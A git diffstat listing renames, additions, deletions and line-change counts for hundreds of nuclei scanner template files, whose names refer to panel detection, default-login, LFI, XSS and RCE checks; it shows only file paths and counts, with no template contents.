.../Other/medium-takeover-8798.yaml | 20 + nuclei-templates/Other/medium-takeover.yaml | 17 - nuclei-templates/Other/meduza-stealer.yaml | 4 +- nuclei-templates/Other/megamenu.yaml | 2 +- nuclei-templates/Other/members-list-xss.yaml | 12 +- nuclei-templates/Other/members.yaml | 2 +- .../Other/memcached-stats-8800.yaml | 8 +- nuclei-templates/Other/memos-panel.yaml | 10 +- nuclei-templates/Other/merlin-c2-jarm.yaml | 5 +- .../Other/meshcentral-login-8801.yaml | 6 +- nuclei-templates/Other/meta-box.yaml | 2 +- nuclei-templates/Other/metabase-log4j.yaml | 36 +- ...se-panel.yaml => metabase-panel-8806.yaml} | 0 .../Other/metadata-alibaba-8808.yaml | 43 + nuclei-templates/Other/metadata-alibaba.yaml | 39 - nuclei-templates/Other/metadata-aws.yaml | 14 +- ...ta-azure.yaml => metadata-azure-8814.yaml} | 0 ...7.yaml => metadata-digitalocean-8818.yaml} | 0 ...-google.yaml => metadata-google-8820.yaml} | 0 nuclei-templates/Other/metadata-hetzner.yaml | 14 +- .../Other/metadata-openstack-8826.yaml | 39 - .../Other/metadata-openstack-8828.yaml | 40 + .../Other/metadata-oracle-8831.yaml | 40 + nuclei-templates/Other/metadata-oracle.yaml | 40 - .../Other/metasploit-c2-jarm.yaml | 5 +- nuclei-templates/Other/metasploit-c2.yaml | 9 +- nuclei-templates/Other/metasploit-panel.yaml | 10 +- .../Other/metasploit-setup-page.yaml | 15 +- nuclei-templates/Other/metatag-cms-8832.yaml | 35 - nuclei-templates/Other/metatag-cms-8833.yaml | 30 + .../Other/metaview-explorer-installer.yaml | 5 +- nuclei-templates/Other/meteor-takeover.yaml | 6 +- .../Other/metersphere-plugin-rce-8837.yaml | 52 + .../Other/metersphere-plugin-rce.yaml | 59 - nuclei-templates/Other/metinfo-lfi-8840.yaml | 33 + nuclei-templates/Other/metinfo-lfi.yaml | 30 - nuclei-templates/Other/mfiles-web-detect.yaml | 13 +- .../Other/microfocus-admin-server.yaml | 12 +- .../Other/microfocus-filr-panel.yaml | 12 +- .../Other/microfocus-vibe-panel.yaml | 13 +- .../microsoft-echange-server-detect.yaml | 32 - ...aml => microsoft-exchange-login-8846.yaml} | 0 .../Other/microsoft-exchange-panel-8848.yaml | 21 + .../Other/microsoft-exchange-panel.yaml | 24 - ...microsoft-exchange-server-detect-8854.yaml | 26 + ... => microsoft-exchange-workflow-8855.yaml} | 0 .../Other/microsoft-ftp-service.yaml | 52 +- .../Other/microsoft-iis-version.yaml | 12 +- .../Other/microsoft-sharepoint-detect.yaml | 6 +- .../Other/microsoft-teams-webhook-8856.yaml | 17 - .../Other/microsoft-teams-webhook-8858.yaml | 15 + .../Other/microstrategy-ssrf-8859.yaml | 3 - .../Other/microweber-detect-8862.yaml | 30 + nuclei-templates/Other/microweber-detect.yaml | 26 - nuclei-templates/Other/microweber-xss.yaml | 5 - .../Other/mikrotik-ftp-server-detect.yaml | 62 +- .../Other/mikrotik-graph-8870.yaml | 20 + nuclei-templates/Other/mikrotik-graph.yaml | 24 - .../Other/mikrotik-httpproxy.yaml | 5 +- .../Other/mikrotik-routeros-api.yaml | 13 +- .../Other/mikrotik-routeros-old.yaml | 12 +- nuclei-templates/Other/mikrotik-routeros.yaml | 6 +- .../Other/milesight-system-log.yaml | 4 +- .../Other/minimouse-lfi-8880.yaml | 24 + nuclei-templates/Other/minimouse-lfi.yaml | 28 - .../Other/minio-browser-8882.yaml | 24 - .../Other/minio-browser-8883.yaml | 20 + .../Other/minio-console-8886.yaml | 26 - nuclei-templates/Other/minio-console.yaml | 21 + ...889.yaml => minio-default-login-8888.yaml} | 0 .../Other/minio-default-password-8891.yaml | 0 nuclei-templates/Other/minio-detect-8892.yaml | 0 .../Other/mirai-unknown-rce-8899.yaml | 25 - nuclei-templates/Other/mirai-unknown-rce.yaml | 29 + .../Other/misconfigured-docker-8900.yaml | 26 - .../Other/misconfigured-docker.yaml | 22 + .../Other/misconfigured-redis.yaml | 74 +- .../Other/mismatched-ssl-certificate.yaml | 5 +- nuclei-templates/Other/misp-panel.yaml | 8 +- nuclei-templates/Other/missing-csp.yaml | 2 - nuclei-templates/Other/missing-hsts.yaml | 33 +- .../Other/missing-x-frame-options.yaml | 38 +- .../Other/mitel-panel-detect.yaml | 13 +- nuclei-templates/Other/ml-slider.yaml | 4 +- .../Other/mobile-management-panel.yaml | 9 +- .../Other/mobileiron-log4j-jndi-rce-8905.yaml | 36 + .../Other/mobileiron-log4j-jndi-rce.yaml | 41 - nuclei-templates/Other/mobileiron-login.yaml | 2 - nuclei-templates/Other/mobileiron-sentry.yaml | 5 +- .../Other/mobiproxy-dashboard.yaml | 12 +- .../Other/mobotix-default-login.yaml | 6 +- ...ra.yaml => mobotix-guest-camera-8911.yaml} | 0 nuclei-templates/Other/modoboa-panel.yaml | 13 +- .../Other/modula-image-gallery-xss.yaml | 15 +- .../Other/mofi4500-default-login.yaml | 8 +- ...-detect.yaml => moinmoin-detect-8916.yaml} | 0 .../Other/moleculer-microservices.yaml | 7 +- .../Other/mongodb-detect-8920.yaml | 20 + nuclei-templates/Other/mongodb-detect.yaml | 24 - .../Other/mongodb-exporter-metrics.yaml | 20 +- nuclei-templates/Other/mongodb-info-enum.yaml | 15 +- .../Other/mongodb-ops-manager-8922.yaml | 20 + .../Other/mongodb-ops-manager.yaml | 22 - .../Other/mongodb-unauth-8926.yaml | 22 - nuclei-templates/Other/mongodb-unauth.yaml | 23 + nuclei-templates/Other/mongoose-server.yaml | 5 +- .../Other/monitorix-exposure-8929.yaml | 28 - .../Other/monitorix-exposure-8933.yaml | 27 + .../Other/monstra-admin-panel.yaml | 12 +- nuclei-templates/Other/monstra-installer.yaml | 5 +- nuclei-templates/Other/monstracms-detect.yaml | 6 +- .../Other/moodle-changelog-8934.yaml | 31 - .../Other/moodle-changelog-8935.yaml | 26 + .../Other/moodle-filter-jmol-lfi-8937.yaml | 20 + .../Other/moodle-filter-jmol-lfi.yaml | 22 - .../Other/moodle-filter-jmol-xss-8942.yaml | 26 + .../Other/moodle-filter-jmol-xss-8945.yaml | 30 - nuclei-templates/Other/moodle-installer.yaml | 5 +- .../Other/moodle-jitsi-plugin-xss.yaml | 5 - .../Other/moodle-workplace-panel.yaml | 4 +- nuclei-templates/Other/moodle-xss-8950.yaml | 32 - nuclei-templates/Other/moodle-xss.yaml | 28 + .../{signatures-10245.yaml => moodle.yaml} | 0 .../Other/movable-type-login.yaml | 4 - nuclei-templates/Other/moveit-detect.yaml | 30 - .../Other/moveit-transfer-detect.yaml | 34 + .../Other/mpftvc-admin-panel.yaml | 9 +- .../Other/mpsec-isg1000-panel.yaml | 7 +- nuclei-templates/Other/mpsec-lfi-8957.yaml | 10 +- nuclei-templates/Other/mrtg-detect-8959.yaml | 29 - nuclei-templates/Other/mrtg-detect.yaml | 26 + nuclei-templates/Other/ms-adcs-detect.yaml | 53 +- ...s-exchange-server-reflected-xss-8962.yaml} | 0 .../Other/ms-exchange-server.yaml | 7 +- .../Other/ms-exchange-web-service.yaml | 8 +- nuclei-templates/Other/msmtp-config.yaml | 5 - nuclei-templates/Other/mspcontrol-login.yaml | 9 +- .../Other/mssql-default-logins.yaml | 4 +- nuclei-templates/Other/mssql-detect.yaml | 4 +- .../{msvod-sqli.yaml => msvod-sqli-8969.yaml} | 0 nuclei-templates/Other/mthemeunus-lfi.yaml | 12 +- .../Other/multilaser-pro-setup.yaml | 7 +- .../Other/music-store-open-redirect.yaml | 3 - nuclei-templates/Other/my-chatbot-xss.yaml | 13 +- nuclei-templates/Other/mybb-forum-detect.yaml | 12 +- .../Other/mybb-forum-install.yaml | 15 +- .../Other/mylittleadmin-panel.yaml | 9 +- .../Other/mylittlebackup-panel.yaml | 10 +- nuclei-templates/Other/mysql-detect.yaml | 59 +- .../Other/mysql-native-cred-bruteforce.yaml | 3 - .../Other/mysql-native-password-8980.yaml | 15 + .../Other/mysql-native-password.yaml | 18 - .../Other/mysqld-exporter-metrics.yaml | 7 +- nuclei-templates/Other/mystic-stealer.yaml | 5 +- nuclei-templates/Other/mystrom-panel.yaml | 9 +- nuclei-templates/Other/mythic-c2-jarm.yaml | 5 +- nuclei-templates/Other/mythic-c2-ssl.yaml | 5 +- nuclei-templates/Other/mythic-c2.yaml | 7 +- nuclei-templates/Other/myucms-lfr-8985.yaml | 1 - nuclei-templates/Other/nacos-auth-bypass.yaml | 7 +- nuclei-templates/Other/nacos-unauth.yaml | 8 +- .../Other/nagios-default-credential-8988.yaml | 24 - .../Other/nagios-default-credential.yaml | 23 + .../Other/nagios-default-login-8993.yaml | 34 - .../Other/nagios-default-login.yaml | 39 + nuclei-templates/Other/nagios-panel.yaml | 13 +- .../Other/nagios-status-page.yaml | 14 +- nuclei-templates/Other/nagios-xi-panel.yaml | 13 +- .../Other/nagiosxi-installer.yaml | 5 +- nuclei-templates/Other/nagvis-panel.yaml | 13 +- .../Other/namedprocess-exporter-metrics.yaml | 7 +- ...ml => nativechurch-wp-theme-lfd-8999.yaml} | 0 .../Other/natshell-path-traversal-9005.yaml | 19 + .../Other/natshell-path-traversal-9006.yaml | 24 - nuclei-templates/Other/natshell-rce.yaml | 8 +- .../Other/navicat-server-panel.yaml | 7 +- nuclei-templates/Other/ncentral-panel.yaml | 9 +- nuclei-templates/Other/nconf-panel.yaml | 9 +- nuclei-templates/Other/neighborly.yaml | 59 + nuclei-templates/Other/neo4j-browser.yaml | 12 +- nuclei-templates/Other/neobox-panel.yaml | 11 +- .../Other/neocase-hrportal-panel.yaml | 4 +- ...neos-detect.yaml => neos-detect-9014.yaml} | 0 nuclei-templates/Other/neos-panel.yaml | 8 +- nuclei-templates/Other/nessus-panel.yaml | 5 - ...etcore-unauth.yaml => netcore-unauth.yaml} | 0 .../Other/netdata-dashboard-detected.yaml | 45 +- nuclei-templates/Other/netdata-panel.yaml | 10 +- .../Other/netflix-conductor-ui-9023.yaml | 39 + .../Other/netflix-conductor-ui.yaml | 29 - .../Other/netflix-conductor-version-9024.yaml | 44 - .../Other/netflix-conductor-version.yaml | 37 + .../Other/netgear-router-auth-bypass-1.yaml | 32 + .../Other/netgear-router-auth-bypass-2.yaml | 32 + .../netgear-router-auth-bypass-9027.yaml | 34 + .../Other/netgear-router-auth-bypass.yaml | 34 - .../Other/netgear-router-exposure-9031.yaml | 36 + .../Other/netgear-router-exposure.yaml | 42 - .../netgear-wac124-router-auth-bypass.yaml | 16 +- ...rce.yaml => netgear-wnap320-rce-9032.yaml} | 0 .../Other/netis-info-leak-9036.yaml | 35 - nuclei-templates/Other/netis-info-leak.yaml | 30 + ...tis-router.yaml => netis-router-9037.yaml} | 0 nuclei-templates/Other/netlify-cms.yaml | 3 - nuclei-templates/Other/netlify-takeover.yaml | 3 +- .../Other/netman-default-login.yaml | 6 +- .../Other/netman_204_firmware.yaml | 24 + nuclei-templates/Other/netrc-9045.yaml | 38 + nuclei-templates/Other/netrc-9046.yaml | 35 - .../Other/netris-dashboard-panel.yaml | 9 +- .../Other/netscalar-aaa-login.yaml | 33 +- .../Other/netscaler-aaa-login-9050.yaml | 18 - .../Other/netscaler-aaa-login.yaml | 16 + .../Other/netscaler-gateway-9055.yaml | 22 + nuclei-templates/Other/netscaler-gateway.yaml | 16 - .../netsparker-enterprise-installer.yaml | 5 +- nuclei-templates/Other/netsparker-panel.yaml | 9 +- .../Other/netsus-default-login.yaml | 4 - .../Other/netsus-server-login-9062.yaml | 20 + .../Other/netsus-server-login.yaml | 20 - ...aml => netsweeper-open-redirect-9064.yaml} | 0 nuclei-templates/Other/netsweeper-rxss.yaml | 5 - .../netsweeper-webadmin-detect-9066.yaml | 24 + .../Other/netsweeper-webadmin-detect.yaml | 26 - nuclei-templates/Other/netterce.yaml | 28 - .../Other/network-camera-detect.yaml | 2 - .../Other/network_security_manager.yaml | 20 + .../Other/new-user-approve-xss.yaml | 16 +- .../Other/newrelic-pixie-apikey.yaml | 5 +- .../Other/newrelic-pixie-deploykey.yaml | 5 +- ...newsletter-manager-open-redirect-9075.yaml | 3 - .../Other/newsletter-open-redirect-9077.yaml | 5 +- nuclei-templates/Other/newsletter.yaml | 2 +- .../Other/next-gen_application_firewall.yaml | 20 + ...detect.yaml => nextcloud-detect-9079.yaml} | 0 .../Other/nextcloud-install-9082.yaml | 28 - .../Other/nextcloud-install-9085.yaml | 24 + .../Other/nextcloud-owncloud-detect.yaml | 24 +- .../Other/nextend-facebook-connect.yaml | 2 +- nuclei-templates/Other/nextgen-gallery.yaml | 2 +- nuclei-templates/Other/nextjs-redirect.yaml | 5 +- .../Other/nexus-default-login-9086.yaml | 39 + .../Other/nexus-default-login.yaml | 36 - .../Other/nexus-default-password.yaml | 3 - ...xus-detect.yaml => nexus-detect-9094.yaml} | 0 nuclei-templates/Other/nexus-panel.yaml | 4 +- nuclei-templates/Other/nginx-Detect.yaml | 19 + nuclei-templates/Other/nginx-admin-panel.yaml | 9 +- .../Other/nginx-auto-installer.yaml | 5 +- nuclei-templates/Other/nginx-detect.yaml | 22 - .../Other/nginx-linux-page-9102.yaml | 17 + nuclei-templates/Other/nginx-linux-page.yaml | 17 - .../Other/nginx-module-vts-xss-9108.yaml | 23 + .../Other/nginx-module-vts-xss-9109.yaml | 28 - .../Other/nginx-proxy-manager-9111.yaml | 29 + .../Other/nginx-proxy-manager.yaml | 26 - nuclei-templates/Other/nginx-shards.yaml | 4 +- nuclei-templates/Other/nginx-status.yaml | 4 +- .../Other/nginx-ui-dashboard.yaml | 14 +- .../Other/nginx-version-9121.yaml | 25 + nuclei-templates/Other/nginx-version.yaml | 30 - .../Other/nginx-vhost-traffic-status.yaml | 3 - .../Other/nginxwebui-runcmd-rce.yaml | 35 +- nuclei-templates/Other/ngrok-status-page.yaml | 9 +- nuclei-templates/Other/nh-c2.yaml | 7 +- ...l-enum.yaml => niagara-fox-info-enum.yaml} | 0 nuclei-templates/Other/nifi-detech.yaml | 3 - nuclei-templates/Other/nifi.yaml | 20 + nuclei-templates/Other/nimsoft-wasp.yaml | 6 +- nuclei-templates/Other/ninja-forms.yaml | 2 +- .../Other/ninjaform-open-redirect-9133.yaml | 31 + .../Other/ninjaform-open-redirect-9134.yaml | 35 - .../Other/node-integration-enabled-9136.yaml | 20 + .../Other/node-integration-enabled-9137.yaml | 21 - ...-detect.yaml => node-red-detect-9139.yaml} | 0 nuclei-templates/Other/nodebb-installer.yaml | 5 +- nuclei-templates/Other/noescape-login.yaml | 9 +- .../Other/nopcommerce-installer.yaml | 16 +- .../Other/nordex-wind-farm-portal.yaml | 10 +- .../Other/normhost-backup-server-manager.yaml | 12 +- nuclei-templates/Other/notebook.yaml | 24 + .../Other/notificationx-sqli.yaml | 66 +- nuclei-templates/Other/notion-detect.yaml | 5 +- nuclei-templates/Other/novnc-login-panel.yaml | 11 +- nuclei-templates/Other/novus-ip-camera.yaml | 11 +- nuclei-templates/Other/nozomi-panel.yaml | 9 +- nuclei-templates/Other/np-data-cache.yaml | 9 +- nuclei-templates/Other/npm-accesstoken.yaml | 5 +- nuclei-templates/Other/npm-anonymous-cli.yaml | 6 +- .../Other/npm-cli-metrics-json.yaml | 6 +- nuclei-templates/Other/npm-debug-log.yaml | 6 +- nuclei-templates/Other/npm-log-file-9141.yaml | 22 - nuclei-templates/Other/npm-log-file.yaml | 18 + .../Other/npm-shrinkwrap-exposure.yaml | 13 +- nuclei-templates/Other/npmrc-authtoken.yaml | 5 +- nuclei-templates/Other/nport-web-console.yaml | 9 +- ...-9145.yaml => nps-default-login-9142.yaml} | 0 .../Other/nps-default-password.yaml | 3 - .../Other/ns-asg-file-read-9151.yaml | 8 +- nuclei-templates/Other/ns-asg.yaml | 22 + .../Other/nsicg-default-login.yaml | 11 +- nuclei-templates/Other/nsq-admin-panel.yaml | 10 +- nuclei-templates/Other/ntlm-directories.yaml | 119 +- nuclei-templates/Other/ntop-detect.yaml | 7 +- .../Other/ntop-panel-exposed.yaml | 5 +- .../Other/ntopng-traffic-dashboard.yaml | 14 +- nuclei-templates/Other/nuget-key.yaml | 5 +- .../Other/nuget-package-config.yaml | 6 +- .../Other/nuuno-network-login-9161.yaml | 20 + .../Other/nuuno-network-login.yaml | 24 - .../Other/nuuo-file-inclusion.yaml | 17 +- .../Other/nuuo-nvrmini2-rce-9170.yaml | 23 + .../Other/nuuo-nvrmini2-rce-9171.yaml | 27 - .../Other/nuxeo-platform-panel.yaml | 10 +- nuclei-templates/Other/nuxt-js-semi-lfi.yaml | 4 +- nuclei-templates/Other/nzbget-panel.yaml | 12 +- nuclei-templates/Other/o2-easy-panel.yaml | 12 +- .../Other/o2oa-default-login.yaml | 36 +- nuclei-templates/Other/o2oa.yaml | 20 + ...aml => oa-tongda-path-traversal-9178.yaml} | 0 .../Other/oa-v9-uploads-file-9191.yaml | 36 + .../Other/oa-v9-uploads-file.yaml | 32 - .../Other/oauth-access-key-9184.yaml | 15 + .../Other/oauth-access-key-9186.yaml | 18 - .../Other/oauth-credentials-json.yaml | 5 +- ...h2-detect-9183.yaml => oauth2-detect.yaml} | 0 .../Other/obsolete-ssh-version.yaml | 13 +- nuclei-templates/Other/ocean-extra.yaml | 2 +- nuclei-templates/Other/ocomon-panel.yaml | 20 +- .../Other/ocs-inventory-login.yaml | 21 +- .../Other/octobercms-default-login-9192.yaml | 65 + .../Other/octobercms-default-login-9193.yaml | 66 - ...etect.yaml => octobercms-detect-9195.yaml} | 0 .../Other/octoprint-3dprinter-detect.yaml | 8 +- ...t-login.yaml => octoprint-login-9198.yaml} | 0 ...irect.yaml => odoo-cms-redirect-9199.yaml} | 0 nuclei-templates/Other/odoo-openredirect.yaml | 2 +- nuclei-templates/Other/odoo-panel.yaml | 10 +- .../Other/ofbiz-default-login-9208.yaml | 30 + .../Other/ofbiz-default-login.yaml | 36 - .../Other/office-documents-links.yaml | 27 + .../Other/office-webapps-panel.yaml | 7 +- .../Other/office-webapps-ssrf.yaml | 2 +- ...yaml => office365-open-redirect-9214.yaml} | 0 nuclei-templates/Other/office_anywhere.yaml | 25 + .../Other/office_web_apps_server.yaml | 22 + nuclei-templates/Other/officedocuments.yaml | 24 - .../Other/officekeeper-admin-login.yaml | 9 +- .../Other/official-facebook-pixel.yaml | 2 +- nuclei-templates/Other/oidc-detect.yaml | 3 - ...detect-9219.yaml => oipm-detect-9221.yaml} | 0 .../ojs-unauthenticated-open-redirect.yaml | 3 - nuclei-templates/Other/oki-data.yaml | 6 +- .../Other/okiko-sfiler-portal-9230.yaml | 31 + .../Other/okiko-sfiler-portal.yaml | 26 - nuclei-templates/Other/okta-panel-9234.yaml | 25 - nuclei-templates/Other/okta-panel.yaml | 26 + .../Other/old-copyright-9236.yaml | 34 + nuclei-templates/Other/old-copyright.yaml | 39 - .../Other/oliver-library-lfi-9239.yaml | 25 - .../Other/oliver-library-lfi-9241.yaml | 22 + .../Other/olivetti-crf-detect-9244.yaml | 25 - .../Other/olivetti-crf-detect.yaml | 25 + nuclei-templates/Other/ollama.yaml | 20 + nuclei-templates/Other/olt-web-interface.yaml | 9 +- .../Other/omni-commerce-connect-detect.yaml | 7 +- nuclei-templates/Other/omniampx-panel.yaml | 9 +- .../Other/one-click-demo-import.yaml | 2 +- .../Other/one_line_checks_nuclei.yaml | 30 - .../Other/oneblog-detect-9247.yaml | 4 - .../Other/onlinefarm-management-xss.yaml | 6 +- .../Other/onliner-multiple-bugs.yaml | 26 + .../Other/onlyoffice-login-panel.yaml | 10 +- .../Other/oob-header-based-interaction.yaml | 4 - .../oob-param-based-interaction-9253.yaml | 6 +- ...yaml => opcache-status-exposure-9254.yaml} | 0 .../Other/open-game-panel-9279.yaml | 26 - nuclei-templates/Other/open-game-panel.yaml | 22 + .../Other/open-journal-systems.yaml | 6 +- .../Other/open-mjpg-streamer-9284.yaml | 9 +- .../Other/open-proxy-internal-9288.yaml | 136 - .../Other/open-proxy-internal.yaml | 111 + ...st-9293.yaml => open-proxy-localhost.yaml} | 0 .../Other/open-proxy-portscan-9296.yaml | 4 +- .../Other/open-redirect-9309.yaml | 27 + .../Other/open-redirect-plus.yaml | 607 + nuclei-templates/Other/open-redirect.yaml | 44 - nuclei-templates/Other/open-redirect2.yaml | 607 - .../open-stack-dashboard-login-9324.yaml | 21 + .../Other/open-stack-dashboard-login.yaml | 24 - ...n-virtualization-manager-detect-9325.yaml} | 0 ...pen-virtualization-manager-panel-9328.yaml | 38 - .../open-virtualization-manager-panel.yaml | 39 + nuclei-templates/Other/openai-key.yaml | 5 +- nuclei-templates/Other/openam-detection.yaml | 57 +- nuclei-templates/Other/openam-panel.yaml | 65 +- ...orkflow.yaml => openam-workflow-9259.yaml} | 0 nuclei-templates/Other/openapi.yaml | 20 +- nuclei-templates/Other/openbmcs-detect.yaml | 16 +- ...l => openbmcs-secret-disclosure-9260.yaml} | 0 ...bmcs-ssrf.yaml => openbmcs-ssrf-9261.yaml} | 0 nuclei-templates/Other/openbullet2-panel.yaml | 5 +- nuclei-templates/Other/opencart-panel.yaml | 12 +- .../Other/opencast-detect-9263.yaml | 25 + nuclei-templates/Other/opencast-detect.yaml | 21 - .../Other/opencats-default-login.yaml | 9 +- nuclei-templates/Other/opencats-panel.yaml | 13 +- nuclei-templates/Other/opencpu-panel.yaml | 15 +- nuclei-templates/Other/opencpu-rce.yaml | 14 +- nuclei-templates/Other/opencti-lfi-9268.yaml | 19 + nuclei-templates/Other/opencti-lfi.yaml | 36 - .../Other/opendreambox-webadmin-rce.yaml | 2 +- .../Other/openemr-default-login-9269.yaml | 46 + .../Other/openemr-default-login.yaml | 49 - .../Other/openemr-detect-9271.yaml | 25 + nuclei-templates/Other/openemr-detect.yaml | 24 - .../Other/openerp-database-9275.yaml | 22 - nuclei-templates/Other/openerp-database.yaml | 18 + .../Other/openethereum-server-detect.yaml | 7 +- .../Other/openfire-admin-panel.yaml | 15 +- nuclei-templates/Other/opengear-detect.yaml | 16 - nuclei-templates/Other/opengear-panel.yaml | 10 +- nuclei-templates/Other/openhap-detect.yaml | 8 +- nuclei-templates/Other/openmage-install.yaml | 5 +- .../Other/openmediavault-default-login.yaml | 11 +- nuclei-templates/Other/openmediavault.yaml | 20 + nuclei-templates/Other/opennebula-panel.yaml | 9 +- .../Other/opennms-log4j-jndi-rce.yaml | 26 +- ...ole.yaml => opennms-web-console-9287.yaml} | 0 nuclei-templates/Other/openresty-detect.yaml | 7 +- .../Other/openshift-installer-panel.yaml | 7 +- nuclei-templates/Other/openshift_origin.yaml | 20 + .../Other/opensis-detect-9314.yaml | 27 - nuclei-templates/Other/opensis-installer.yaml | 5 +- nuclei-templates/Other/opensis-lfi-9315.yaml | 27 + nuclei-templates/Other/opensis-lfi.yaml | 28 - nuclei-templates/Other/opensis-panel.yaml | 24 + ...rkflow-9319.yaml => opensis-workflow.yaml} | 0 nuclei-templates/Other/opensns-rce.yaml | 5 - nuclei-templates/Other/openssh-detect.yaml | 18 +- nuclei-templates/Other/openssh-detection.yaml | 6 +- .../Other/openssh-username-enumeration.yaml | 287 +- nuclei-templates/Other/openssl-detect.yaml | 6 +- .../Other/openstack-user-secrets.yaml | 6 +- .../opentouch-multimediaservices-panel.yaml | 5 +- nuclei-templates/Other/opentsdb-status.yaml | 4 +- nuclei-templates/Other/openvas-panel.yaml | 4 +- nuclei-templates/Other/openvpn-admin.yaml | 13 +- nuclei-templates/Other/openvpn-connect.yaml | 12 +- ...openvpn-hhi.yaml => openvpn-hhi-9329.yaml} | 0 .../Other/openvpn-monitor-9331.yaml | 35 - nuclei-templates/Other/openvpn-monitor.yaml | 30 + .../Other/openvpn-router-management.yaml | 12 +- nuclei-templates/Other/openvz-web-login.yaml | 9 +- .../Other/openwrt-default-login-9332.yaml | 21 + .../Other/openwrt-default-login.yaml | 24 - .../Other/openwrt-login-9333.yaml | 36 - nuclei-templates/Other/openwrt-login.yaml | 27 + .../Other/openwrt-luci-panel.yaml | 8 +- nuclei-templates/Other/openx-detect-9334.yaml | 32 - nuclei-templates/Other/openx-detect.yaml | 27 + nuclei-templates/Other/openx-panel.yaml | 30 +- ...erations-automation-default-page-9337.yaml | 23 + .../operations-automation-default-page.yaml | 19 - nuclei-templates/Other/opinio-panel.yaml | 4 +- .../Other/optilink-ont1gew-gpon-rce-9342.yaml | 28 + .../Other/optilink-ont1gew-gpon-rce.yaml | 31 - nuclei-templates/Other/optinmonster.yaml | 2 +- nuclei-templates/Other/options-method.yaml | 7 +- .../Other/oracle-access-manager-detect.yaml | 5 +- .../Other/oracle-atg-commerce.yaml | 12 +- ...yaml => oracle-business-control-9347.yaml} | 0 .../Other/oracle-business-intelligence.yaml | 12 +- .../Other/oracle-cgi-printenv.yaml | 11 +- .../Other/oracle-containers-panel.yaml | 8 +- nuclei-templates/Other/oracle-dbcs-9353.yaml | 23 - nuclei-templates/Other/oracle-dbcs.yaml | 21 + ...oracle-ebs-bispgraph-file-access-9358.yaml | 20 + .../oracle-ebs-bispgraph-file-access.yaml | 23 - ....yaml => oracle-ebs-credentials-9365.yaml} | 0 .../oracle-ebs-credentials-disclosure.yaml | 28 + nuclei-templates/Other/oracle-ebs-lfi.yaml | 94 +- .../oracle-ebs-sqllog-disclosure-9371.yaml | 27 + .../Other/oracle-ebs-sqllog-disclosure.yaml | 30 - .../Other/oracle-ebs-xss-9375.yaml | 29 + .../Other/oracle-ebs-xss-9376.yaml | 33 - .../Other/oracle-ebusiness-openredirect.yaml | 2 +- ...oracle-ebusiness-registration-enabled.yaml | 4 - .../oracle-enterprise-manager-login.yaml | 11 +- .../Other/oracle-fatwire-lfi-9378.yaml | 25 - .../Other/oracle-fatwire-lfi.yaml | 29 + .../Other/oracle-httpserver-12c.yaml | 32 + .../Other/oracle-httpserver12c.yaml | 34 - .../Other/oracle-integrated-manager-9386.yaml | 31 - .../Other/oracle-integrated-manager.yaml | 32 + ...ml => oracle-iplanet-web-server-9392.yaml} | 0 nuclei-templates/Other/oracle-oam-xss(1).yaml | 24 + .../Other/oracle-opera-login.yaml | 5 +- .../Other/oracle-people-enterprise-9398.yaml | 25 - .../Other/oracle-people-enterprise.yaml | 26 + .../Other/oracle-people-sign-in-9399.yaml | 29 - .../Other/oracle-people-sign-in.yaml | 25 + .../Other/oracle-peoplesoft-workflow.yaml | 6 +- ...l-xss.yaml => oracle-siebel-xss-9402.yaml} | 0 nuclei-templates/Other/oracle-test-cgi.yaml | 5 +- ...-listner.yaml => oracle-tns-listener.yaml} | 0 .../Other/oracle-webcenter-sites.yaml | 5 +- .../Other/orangehrm-installer.yaml | 7 +- ...aml => orbiteam-bscw-server-lfi-9404.yaml} | 0 ...iteam-bscw-server-unauthenticated-lfi.yaml | 4 - nuclei-templates/Other/orchid-vms-panel.yaml | 12 +- nuclei-templates/Other/orcus-rat-c2.yaml | 5 +- nuclei-templates/Other/ords-panel.yaml | 34 +- .../Other/oscommerce-rce-9408.yaml | 30 + nuclei-templates/Other/oscommerce-rce.yaml | 35 - nuclei-templates/Other/osnexus-panel.yaml | 3 +- .../Other/osquery-fleet-detect.yaml | 11 +- nuclei-templates/Other/osticket-install.yaml | 20 +- nuclei-templates/Other/osticket-panel.yaml | 13 +- ...ect.yaml => otobo-open-redirect-9411.yaml} | 0 nuclei-templates/Other/otobo-panel-9412.yaml | 24 + nuclei-templates/Other/otobo-panel.yaml | 33 - nuclei-templates/Other/otter-blocks.yaml | 4 +- nuclei-templates/Other/ourmgmt3-panel.yaml | 10 +- nuclei-templates/Other/overseerr-panel.yaml | 7 +- .../Other/ovpn-config-exposed.yaml | 13 +- .../Other/owasp-juice-shop-detected-9418.yaml | 21 + .../Other/owasp-juice-shop-detected.yaml | 25 - ...-config.yaml => owncloud-config-9420.yaml} | 0 .../Other/owncloud-installer-exposure.yaml | 6 +- .../Other/oxid-eshop-installer.yaml | 5 +- nuclei-templates/Other/pa11y-dashboard.yaml | 5 +- ...-json-9421.yaml => package-json-9423.yaml} | 0 .../pacs-connexion-utilisateur-9424.yaml | 20 + .../Other/pacs-connexion-utilisateur.yaml | 23 - .../Other/pacsone-server-6-6-2-lfi.yaml | 2 +- .../Other/pacsone-server-lfi-9430.yaml | 27 + .../Other/pacsone-server-lfi.yaml | 20 - nuclei-templates/Other/pagekit-installer.yaml | 5 +- ...{api-pagerduty-475.yaml => pagerduty.yaml} | 0 nuclei-templates/Other/pagespeed-detect.yaml | 7 +- ...keover.yaml => pagewiz-takeover-9436.yaml} | 0 nuclei-templates/Other/pahtool-panel.yaml | 4 +- nuclei-templates/Other/pairdrop-panel.yaml | 4 +- .../Other/panabit-default-login.yaml | 34 +- ...aml => panabit-default-password-9441.yaml} | 0 .../Other/panabit-ixcache-default-login.yaml | 15 +- nuclei-templates/Other/panabit-panel.yaml | 4 - ...-rce.yaml => panabit-sy_addmount-rce.yaml} | 0 ...og-fileread.yaml => panalog-fileRead.yaml} | 0 .../panasonic-network-management-9450.yaml | 20 + .../Other/panasonic-network-management.yaml | 21 - .../Other/pandora-fms-console-9451.yaml | 22 + .../Other/pandora-fms-console.yaml | 20 - ...gin.yaml => panos-default-login-9454.yaml} | 0 nuclei-templates/Other/pantheon-takeover.yaml | 5 +- nuclei-templates/Other/pantheon-upstream.yaml | 5 +- nuclei-templates/Other/papercut-ng-panel.yaml | 10 +- .../Other/parallels-hsphere-detect.yaml | 13 +- .../Other/parallels-hsphere-xss.yaml | 7 +- .../Other/parallels-html-client-9462.yaml | 17 - .../Other/parallels-html-client.yaml | 15 + .../Other/parameters-config-9465.yaml | 38 + nuclei-templates/Other/parameters-config.yaml | 36 - nuclei-templates/Other/parentlink-xss.yaml | 8 +- nuclei-templates/Other/parse-dashboard.yaml | 14 +- nuclei-templates/Other/passbolt-panel.yaml | 6 +- 